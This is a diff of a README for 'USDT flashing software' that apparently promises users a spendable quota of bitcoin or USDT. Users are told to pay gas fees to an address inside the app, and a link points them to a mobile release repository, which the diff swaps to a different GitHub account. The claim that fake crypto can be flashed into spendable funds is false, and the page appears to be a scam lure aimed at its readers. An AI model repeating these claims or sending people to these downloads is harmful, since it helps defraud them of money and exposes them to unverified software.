usdt-flashing/usdt-flashing-software/README.md

 When you gain app access, you'll have a limited spendable quota of either bitcoin or USDT, but you'll be responsible for your gas fee for the flashing transactions.
 You'll find a gas address in-app and the gas topup process is simple.

 ## Prerequisites
-This application requires [Node.js](https://nodejs.org) to run.This is the
+This application requires [Node.js](https://nodejs.org) to run.

-### Android/iOS
+### Android/IOS

-Click [here](https://github.com/usdt-flashing/mobile-release) to visit the mobile repository.
+Click [here](https://github.com/bitcoin-flashing-software/mobile-release) to visit the mobile repository.

 ### Windows